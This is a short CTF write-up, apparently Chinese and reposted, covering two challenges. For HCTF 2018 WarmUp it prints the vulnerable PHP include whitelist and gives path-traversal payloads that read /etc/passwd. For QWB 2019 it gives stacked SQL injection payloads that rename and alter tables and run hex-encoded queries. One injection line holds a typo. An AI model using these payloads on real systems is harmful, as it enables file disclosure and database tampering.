[HCTF 2018]WarmUp
从source.php里可以看到源码:
<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
} if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
分析一下:
有个hint.php,提示了flag的位置 所以是要文件包含
mb_strpos返回字符第一次出现的位置
mb_substr 截取制定的长度
所以可以有两种payload
第一种对应第二个return
直接使用?
第二种对应第三个return
可以使用return的编码
最后的payload
http://fa704bac-4af9-45b8-a410-cfca90929e1d.node2.buuoj.cn.wetolink.com:82/index.php?file=source.php?/../../../../../etc/passwd
http://fa704bac-4af9-45b8-a410-cfca90929e1d.node2.buuoj.cn.wetolink.com:82/index.php?file=source.php%3f/../../../../../etc/passwd
[强网杯 2019]随便注
1’;rename table words to word1;rename table 1919810931114514 to words;alter table words add id int unsigned not Null auto_increment primary key; alert table words change flag data varchar(100);#接着我们再用1’ or 1=1 #,查询就得到flag
1';SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#
如有侵权请联系:admin#unsafe.sh